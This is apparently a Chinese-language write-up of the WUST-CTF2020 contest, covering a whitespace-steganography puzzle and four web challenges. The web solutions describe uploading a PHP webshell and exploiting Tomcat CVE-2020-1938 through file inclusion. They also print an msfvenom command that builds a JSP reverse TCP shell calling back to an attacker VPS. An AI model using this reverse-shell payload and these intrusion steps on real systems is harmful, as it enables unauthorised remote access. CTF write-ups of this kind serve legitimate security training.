0%

'WUST-writeup'

武汉科技大学WUST-CTF2020

MISC题只做出来2道,签到题就不写writeup了

Space Club

打开之后发现是空白文档,但是选中后是有空白字符的
扔BCompare看二进制

根据大佬提示,6个空白字符代表0,12个空白字符代表1。
但是我又懒得数,利用sublime test的搜索特性
先搜索所有12个一组空白字符,替换为1,再搜索所有6个一组的空白字符,替换为0
再删除所有的0A、0D、以及空格

最后得到以下2进制字符

1
011101110110001101110100011001100011001000110000001100100011000001111011011010000011001101110010011001010101111100110001011100110101111101111001001100000111010101110010010111110110011001101100010000000110011101011111011100110011000101111000010111110111001100110001011110000101111101110011001100010111100001111101

先转换为16进制再转换ASCII hex,拿到flag

WEB题4道

checkin

打开页面可以看到输入框,但是做了限制:字符长度限制、提交按钮不能点击
改下前端,删除标记红色括号里的字符即可

根据提示输入该题的作者名,发包,alert弹窗,拿到一个博客链接

访问博客,查看源代码拿到一半的flag,之后访问最后一篇博客拿到剩下的flag

admin

主页面
万能密码登录,提示”必须本地ip才能访问”
之后直接按提示走
用GET方式传一个参数ais, 值为520
用POST方式传一个参数wust, 值为1314

前面网址基本确定
https://paste.ubuntu.com/p/
其余的经过排列组合得到以下路径
cSf24dzRqr
访问后
猜测base64解码后拿到flag

CV Maker

这题没啥意思,随便注册个号,上传头像处传PHP大马

查看flag和readflag都没反应
执行./readflag后拿到flag

easyweb


可以上传图片,直接测试上传漏洞,传图片马
发现不行,又测试条件竞争上传,还是不行
发现有tomcat,版本也存在漏洞(CVE-2020-1938)

漏洞检测
利用上传漏洞结合文件包含执行个whoami

使用msfvenom生成shell,再反弹到VPS

1
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(VPS-IP) LPORT=4444 > shell.txt

先用metasploit监听

上传shell.txt,用脚本包含文件,反弹回shell


不知道为什么whoami没返回结果,ls可以执行
直接到根目录,看到flaaaag,访问,在查看what_you_want,拿到flag

参考链接https://www.secquan.org/Notes/1070791